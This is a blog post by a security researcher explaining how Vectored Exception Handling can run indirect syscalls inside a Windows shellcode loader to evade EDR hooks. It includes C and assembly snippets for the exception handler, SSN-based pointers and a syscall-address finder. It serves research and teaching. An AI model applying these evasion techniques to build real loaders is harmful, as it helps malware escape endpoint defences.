Previous

Syscalls via Vectored Exception Handling

I've come across the term Vectored Exception Handling or Vectored Exception Handlers (VEH for short) in the context of malware development, but until now I hadn't really been able to get to grips with the term or the subject. While preparing for my upcoming Endpoint Security Insights workshop, I came across the term Vectored Exception Handling again in the following article from cyberwarfare. The article piqued my curiosity and motivated me to learn more about the topic. As always, I learn best when I write about a topic myself, prepare a presentation or something similar.

Based on cyberwarfare's article, I would like to take up the topic of vectored exception handling in the context of shellcode execution via syscalls and take a closer look at the code required for this.

First of all, I would like to thank my two colleagues Jonas Kemmner and Robert Rostek, who always actively support me and proofread my articles before publication.



Disclaimer


The content of this article is intended for research purposes only and must not be used in an unethical or illegal context!

EDR Hooks and Evasion

In principle, there are different types of API hooking, but a common form used by EDRs such as CrowdStrike, Sentinel One, Trend Micro, etc. is inline API hooking. Simply put, in this variant, the execution flow of a user-mode application is redirected to the EDR using a 5-byte unconditional jump instruction jmp. This redirection allows an EDR to dynamically analyse the running application in the context of the Windows APIs and check for malicious behaviour.

In simple terms, inline API hooking can be thought of as a process-level proxy. The EDR only return to the original function and executes the syscall required to transition from user mode to kernel mode if it detects that the code and parameters being executed are not malicious.

From the point of view of a red team or a malicious attacker, the last thing you want is for your malware to be analysed by the EDR in this way, and possibly detected and prevented from running. For this reason, malware developers have become very creative in recent years and can now resort to a variety of different user-mode hooking evasion techniques. For example, an attacker may attempt to unhook or patch the user-mode hooked DLL, such as ntdll.dll or kernel32.dll, using various techniques.

Alternatively or in addition, techniques such as direct or indirect syscalls can be used. For implementation, e.g. in a shellcode loader, the corresponding native APIs are used instead of the Windows APIs, e.g. NtAllocateVirtualMemory() replaces VirtualAlloc(). By directly implementing the native API or the syscall stub of the native API, the shellcode loader no longer needs to access kernel32.dll and ntdll.dll and can therefore bypass the user mode hooks. It should also be noted that EDRs place their hooks in other DLLs such as user32.dll, win32u.dll, kernelbase.dll, etc. The total number of hooks placed varies greatly from EDR to EDR. There are EDRs that place a total of 30 hooks, while other EDRs use up to 80 hooks and more.

Depending on whether direct or indirect syscalls are used, the memory area in which the syscall and return statements of the native APIs used are executed differs. When direct syscalls are used, the complete syscall stub is implemented directly in the malware using assembly instructions. Similarly, the syscall and return instructions are executed within the memory area of the malware (.exe).

.CODE  ; direct syscalls assembly code 
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                 ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, 18h                 ; Move the syscall number into the eax register.
    syscall                      ; Execute syscall.
    ret                          ; Return from the procedure.
NtAllocateVirtualMemory ENDP     ; End of the procedure

The problem from a malware developer's perspective: If a system call (direct syscall) is executed directly by a user mode application under Windows, this leads to a clear Indicator of Compromise (IOC) from the perspective of an EDR. In this case, for example, the thread call stack within an application (malware) can be analysed using Event Tracing for Windows (ETW). The following figure shows the anomaly of the stack frames within the thread call stack of a malware using direct syscalls and the different arrangement of the stack frames compared to a legitimate application.


To work around this problem, or to make the thread call stack more legitimate within a malware, direct syscalls have been evolved into indirect syscalls. The use of indirect syscalls means that the syscall and return instructions are executed within the syscall stub in memory of ntdll.dll. This behaviour is legitimate on Windows, and compared to direct syscalls, indirect syscalls achieve a higher legitimacy of the thread call stack. 

This can be done programmatically in assembler using an unconditional jump instruction jmp. After the System Service Number (SSN) has been moved into the eax register using the mov instruction, the jmp instruction is used to redirect to the memory area of ntdll.dll. The syscall and return instructions are then executed at the end of the syscall stub within the memory area of ntdll.dll.

.CODE  ; indirect syscalls assembly code
; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                  ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, 18h                  ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall memory address in ntdll.dll
NtAllocateVirtualMemory ENDP      ; End of the procedure

However, the concept of indirect syscalls, i.e. the execution of syscall and return statements in the context of a specific native API within the memory of ntdll.dll, cannot only be achieved by implementing assembly code under C. The same behaviour can also be achieved by using Vectored Exception Handling. How this works in C, for example in the context of a shellcode loader, is explained in this article based on the Cyberwarfare article.

Vectored Exception Handling

Vectored Exception Handling (VEH) was introduced with Windows XP and is part of the exception handling mechanism that handles errors (e.g. division by zero) and unusual conditions or exceptions (e.g. illegal memory access) that can occur during the execution of a program. Vectored Exception Handling is part of the broader Windows Structured Exception Handling (SEH) framework. Unlike SEH, which is defined specifically for a function or block of code, VEH is global to the entire application and is called before the standard structured exception handlers when an error occurs during program execution.

The handler is implemented using PVECTORED_EXCEPTION_HANDLER, called or registered using the Windows API AddVectoredExceptionHandler and unregistered using RemoveVectoredExceptionHandler. The ExceptionCode member can be used within the EXCEPTION_RECORD structure to specify which exception should trigger the handler. With vectored exception handling, developers can implement custom and specific logic for handling exceptions such as EXCEPTION_ACCESS_VIOLATION, EXCEPTION_BREAKPOINT, EXCEPTION_FLT_DIVIDE_BY_ZERO, etc., and gain greater control over how a program responds to various error scenarios.

The following C code shows an example of how to define a VEH function using VectoredExceptionHandler. The code also shows how the Vectored Exception Handler can be registered and deregistered within the main function using AddVectoredExceptionHandler() and RemoveVectoredExceptionHandler().

#include <windows.h>
#include <stdio.h>

// Prototype of the VEH function
LONG CALLBACK VectoredExceptionHandler(EXCEPTION_POINTERS *ExceptionInfo);

// Implementation of the VEH function
LONG CALLBACK VectoredExceptionHandler(EXCEPTION_POINTERS *ExceptionInfo) {
    // Check if it's an access violation
    if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
        printf("Access violation detected!\n");
        // Handle the exception here
        // ...
    }

    // Additional exceptions can be handled here
    // ...

    // EXCEPTION_CONTINUE_SEARCH indicates that the next handler function should be called
    return EXCEPTION_CONTINUE_SEARCH;
}

int main() {
    // Add the Vectored Exception Handler
    PVOID handle = AddVectoredExceptionHandler(1, VectoredExceptionHandler);

    // Normal code can be added here
    // ...

    // Remove the Vectored Exception Handler before exiting the program
    RemoveVectoredExceptionHandler(handle);

    return 0;
}

However, red teams and attackers also use vectored exception handling and can obfuscate code flow or achieve accelerated shellcode execution through VEH by implementing it in their malware. For example, the following article from CrowdStrike or the article from Elastic Security Labs shows very nicely how the GULOADER malware uses vectored exception handling to obfuscate the code flow (anti-debugging) and thus make manual analysis by reverse engineering more difficult.

Vectored Syscalls 

As mentioned above, this article examines how to implement vectored exception handling in a shellcode loader for running shellcode via syscalls. I used the code from cyberwarefare, which can be found on Github, as the basis for my shellcode loader. Since I avoid remote injection as much as possible for OPSEC reasons, I have rewritten the shellcode loader for myself so that the execution of the shellcode takes place within the loader to be executed (self injection). I don't want to publish the rewritten code here, but rather explain the principle of vectored exception handling in the context of shellcode execution using the relevant parts of the code.

What is meant by syscalls via vectored exception handling or vectored syscalls? Simply put, we want to achieve syscall execution through the vectored exception handler by defining a VEH function and deliberately throwing an exception. As we will see later, this allows us to execute shell code in the form of indirect syscalls, but without having to implement assembly instructions in the code.

In the following, we will look at the most important code elements needed to implement syscalls via vectored exception handling, and I will try to explain how they work as well as possible.

Vectored Exception Handler Function

The first step is to look at the vectored exception handler function PvectoredExceptionHandler(), which is later called in the main function via the Windows API AddVectoredExceptionHandler(). The function is defined using PVECTORED_EXCEPTION_HANDLER. Within the function, EXCEPTION_RECORD is used to define the criterion (exception) that should trigger a pass to the vectored exception handler. More specifically, we define the value for the ExceptionCode member within EXCEPTION_RECORD. In our case, we assign the value EXCEPTION_ACCESS_VIOLATION to the ExceptionCode member. We will see later why exactly we define this exception and how it is triggered. 

// Vectored Exception Handler function
LONG CALLBACK PvectoredExceptionHandler(PEXCEPTION_POINTERS exception_ptr) {
    // Check if the exception is an access violation
    if (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
        // Modify the thread's context to redirect execution to the syscall address
        // Copy RCX register to R10
        exception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;

        // Copy RIP (Instruction Pointer) to RAX (RIP keeps SSN --> RAX keeps SSN)		
        exception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;

        // Set RIP to global address (set syscalls address retrieved from NtDrawText to RIP register)		
        exception_ptr->ContextRecord->Rip = g_syscall_addr;

        // Continue execution at the new instruction pointer
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    // Continue searching for another exception handler
    return EXCEPTION_CONTINUE_SEARCH;
}

To implement syscalls via vectored exception handling, additional exception_ptr pointers must be defined within the VEH function PvectoredExceptionHandler(). Unlike before, however, the structure CONTEXT is used to access the desired registers rcx, r10, rax, rip. We use these pointers to form the basis for the execution of syscalls via VEH. If I have understood correctly, the structure of the VEH function PvectoredExceptionHandler() ultimately replicates the part of the syscall stub of a native API that is ultimately necessary for the preparation of the SSN and the execution of the SSN via syscall. The following diagram illustrates this analogy.

At the end of the PvectoredExceptionHandler() function, EXCEPTION_CONTINUE_EXECUTION is used to specify that after handling an exception thrown by EXCEPTION_ACCESS_VIOLATION, programm execution should continue from the point where the exception was thrown. If an exception is thrown that has not been thrown by the EXCEPTION_ACCESS_VIOLATION exception, it is passed to the next VEH function via EXCEPTION_CONTINUE_SEARCH. In our case, we have not defined another VEH function, so it would be passed to the Structured Exception Handler (SEH).

// Continue execution at the new instruction pointer
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    // Continue searching for another exception handler
    return EXCEPTION_CONTINUE_SEARCH;

Exception Triggering

After defining the VEH function, a way must be found to specifically throw the EXCEPTION_ACCESS_VIOLATION exception. To do this, all native APIs (which are declared as pointers) are initialised directly in the shellcode loader via the corresponding SSN. However, since a variable defined as a pointer, e.g. pNtAllocateVirtualMemory, should normally point to a memory address and not directly to a value, this leads to an unauthorised memory access which triggers the VEH function via EXCEPTION_ACCESS_VIOLATION

// Define syscall numbers for various NT API functions
enum syscall_no {
    SysNtAllocateVirtualMem = 0x18,    // Syscall number for NtAllocateVirtualMemory
    SysNtWriteVirtualMem = 0x3A,       // Syscall number for NtWriteVirtualMemory
    SysNtProtectVirtualMem = 0x50,     // Syscall number for NtProtectVirtualMemory
    SysNtCreateThreadEx = 0xC2,        // Syscall number for NtCreateThreadEx
    SysNtWaitForSingleObject = 0x4     // Syscall number for NtWaitForSingleObject
};

// Assign system call function pointers to their respective syscall numbers
_NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)SysNtAllocateVirtualMem;
_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)SysNtWriteVirtualMem;
_NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)SysNtProtectVirtualMem;
_NtCreateThreadEx pNtCreateThreadEx = (_NtCreateThreadEx)SysNtCreateThreadEx;
_NtWaitForSingleObject pNtWaitForSingleObject = (_NtWaitForSingleObject)SysNtWaitForSingleObject;

As also described in cyberwarefare's article, initialising the native APIs via the SSN has the advantage that an EXCEPTION_ACCESS_VIOLATION can be triggered in a targeted manner. On the other hand, it has the advantage that the SSN is cached in the rip register, passed to the vectored exception handler and then passed to the rax register within the VEH function PvectoredExceptionHandler().

This process can be visualised very well by debugging in IDA. The following figure clearly shows how the attempt to initialise the native API NtAllocateVirtualMemory() via SSN 0x18 results in an invalid memory access attempt (exc.code c0000005), which throws the Access Violation Exception, a passing to the Vectored Exception Handler takes place, the SSN 0x18 is moved to the rip register and finally to the rax register.

In principle, this prepares the SSN in the rax register (similar to preparation using assembly code mov eax, SSN) for subsequent execution using syscalls. This process is repeated until all native APIs used in the shellcode loader or initiated via SSN have been passed to the vectored exception handler and processed after an EXCEPTION_ACCESS_VIOLATION has been triggered.

Note: The SSN for NtAllocateVirtualMemory() does not necessarily have to be 0x18, as the SSNs for the same function can vary from Windows to Windows and from version to version.

Find Syscall and Return 

Finally, in order to execute the SSN (which is already in the rax register) within the VEH function PvectoredExceptionHandler(), we need to find a way to pass the memory address of a syscall instruction to the rip register.

The first step is to use the Windows API GetModuleHandleA() to access the ntdll.dll memory. The next step is to use the GetProcAddress() API to access a native API such as NtDrawText(). Which API we access in this case does not matter and is independent of which native API we use to reserve memory, copy shellcode, execute shellcode, etc.

// Retrieve the module handle for ntdll.dll (Windows NT Layer DLL)
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (hNtdll == NULL) {
    printf("Failed to get module handle for ntdll.dll\n");
    exit(-1);
}

// Retrieve the address of the NtDrawText function in ntdll.dll
FARPROC drawtext = GetProcAddress(hNtdll, "NtDrawText");
if (drawtext == NULL) {
    printf("Error GetProcess Address\n");
    exit(-1);
}

Ultimately it is just a matter of using the FindSyscallAddr function to access the base address of the previously selected Native API NtDrawText(), and then using an opcode comparison via a while loop to find the syscall and return statement within the syscall stub.

// Function to find the syscall instruction within a function in ntdll.dll
BYTE* FindSyscallAddr(ULONG_PTR base) {
    // Cast the base address to a BYTE pointer for byte-level manipulation
    BYTE* func_base = (BYTE*)(base);
    // Temporary pointer for searching the syscall instruction
    BYTE* temp_base = 0x00;           

    // Iterate through the function bytes to find the syscall instruction pattern (0x0F 0x05)
    // 0xc3 is the opcode for the 'ret' (return) instruction in x64 assembly
    while (*func_base != 0xc3) {      
        temp_base = func_base;
        // Check if the current byte is the first byte of the syscall instruction
        if (*temp_base == 0x0f) {     
            temp_base++;
            // Check if the next byte completes the syscall instruction
            if (*temp_base == 0x05) { 
                temp_base++;
                // Check for 'ret' following the syscall to confirm it's the end of the function
                if (*temp_base == 0xc3) { 
                    temp_base = func_base;
                    break;
                }
            }
        }
        else {
            // Move to the next byte in the function
            func_base++;              
            temp_base = 0x00;
        }
    }
    // Return the address of the syscall instruction
    return temp_base;                
}


The following illustration uses debugging in IDA to show how the base address of the native API NtDrawtext() in the memory of ntdll.dll is first accessed using the Windows APIs GetModuleHandleA() and GetProcAddress() and then the opcode comparison for 0xf, 0x05 (syscall) and 0xc3 (return) is performed using cmp.

The memory address of the syscall instruction is buffered by the g_syscall_addr variable, which is declared global.

// Global variable to store the address of the syscall instruction
ULONG_PTR g_syscall_addr = 0x00;

Finally, the memory address (pointing to the syscall instruction within the syscall stub of NtDrawText()) is passed to the rip register within the VEH function PvectoredExceptionHandler() using exception_ptr.

// Vectored Exception Handler function
LONG CALLBACK PvectoredExceptionHandler(PEXCEPTION_POINTERS exception_ptr) {
    // Check if the exception is an access violation
    if (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
        // Modify the thread's context to redirect execution to the syscall address
        // Copy RCX register to R10
        exception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;

        // Copy RIP (Instruction Pointer) to RAX (RIP keeps SSN --> RAX keeps SSN)		
        exception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;

        // Set RIP to global address (set syscalls address retrieved from NtDrawText to RIP register)		
        exception_ptr->ContextRecord->Rip = g_syscall_addr;

        // Continue execution at the new instruction pointer
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    // Continue searching for another exception handler
    return EXCEPTION_CONTINUE_SEARCH;
}
// Set RIP to the syscall address for execution
exception_ptr->ContextRecord->Rip = g_syscall_addr;

As a reminder: When trying to initialise a native API, e.g. NtAllocateVirtualMemory() via SSN, we were already able to specifically trigger the vectored exception handler via Access Violation Exception and achieve a transfer of SSN 0x18 to the rip or rax register. As we now have a valid memory address for the syscall instruction in the context of the native API NtDrawText(), we can finally execute the syscall for the native API NtAllocateVirtualMemory() via Vectored Exception Handling.

As mentioned above, this process is repeated until all native APIs used in the shellcode loader or initiated via SSN have been separately passed to the vectored exception handler after an EXCEPTION_ACCESS_VIOLATION has been thrown, processed and finally the shellcode executed.

Summary

As a result, we now have the basis for executing the native APIs used in the context of the shellcode loader using syscalls via Vectored Exception Handling (Vectored Syscalls). Here is a rough summary of the main processes in the code.

  • PVECTORED_EXCEPTION_HANDLER is used to define the vectored exception handler function PvectoredExceptionHandler.

  • Within the PvectoredExceptionHandler() function, we define the exception code, e.g. EXCEPTION_ACCESS_VIOLATION, that will trigger a pass to the vectored exception handler.

  • Within the PvectoredExceptionHandler() function, we define the necessary pointers to access the rcx, r10, rax, rip registers.

  • We deliberately trigger the EXCEPTION_ACCESS_VIOLATION that was defined as the exception code within our VEH function.

  • The EXCEPTION_ACCESS_VIOLATION is triggered by trying to initiate a native API, e.g. NtAllocateVirtualMemory() via SSN.

  • The SSN is passed to the rip register, which in turn is passed to the rax register within the VEH function.

  • The Windows API GetModuleHandleA() is used to access the ntdll.dll memory.

  • We also use GetProcAddress() to access the base address of any native API within ntdll.dll (e.g. NtDrawText()).

  • The FindSyscallAddr function performs an opcode comparison using a while loop to find the memory address of the syscall instruction within the sycall stub of the native API (e.g. NtDrawText()).

  • The memory address of the syscall instruction is stored in the global variable g_syscall_addr and passed to the rip register within the VEH function.

  • The syscall is then executed by the registered vectored exception handler for the native API, e.g. NtAllocateVirtualMemory().

  • Repeat the process for any other necessary native APIs required to execute the shellcode, e.g. NtWriteVirtualMemory(), NtProtectVirtualMemory(), NtCreateThreadEx() and NtWaitForSingleObject().


Ultimately, this sequence allows us to execute the shellcode in our loader in the form of (indirect) syscalls using vectored exception handling.

Insights

As mentioned above, direct syscalls or indirect syscalls can be implemented via assembly code within a shellcode loader. However, this article has shown that this can also be done via Vectored Exception Handling (VEH). 

For example, if you compare the arrangement of stack frames within the thread call stack between an indirect syscall shellcode loader and a vectored syscall shellcode loader, you will see that the arrangement is completely identical. This is to be expected, as the execution of the syscall and return statements takes place within the memory of ntdll.dll, using vectored exception handling.

Despite the fact that the native API NtWaitForSingleObject() is executed last in both shellcode loaders, you can see in the thread call stack of the vectored syscall loader (image on the right) that, compared to the indirect syscall loader, the return statement is executed in the memory area of NtDrawText() and not in the memory area of NtWaitForSingleObject(). The simple reason for this is that in our Vectored Syscall Loader we access the base address of NtDrawText() via the Windows API GetProcAddress() in order to find the syscall statement within the syscall stub via an opcode comparison, Finally, the memory address of the syscall instruction is passed to the rip register in the context of NtDrawText() within the VEH function PvectoredExceptionHandler() to execute the syscall via the Vectored Exception Handler.

The extent to which executing syscalls via vectored exception handling offers an advantage over EDR evasion cannot yet be judged due to lack of experience. I hope this article has helped you learn more about vectored exception handling and how it can be used in malware development, e.g. to execute shellcode via syscalls. See you in the next article!

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 31.03.24 17:45:36 31.03.24
Daniel Feichter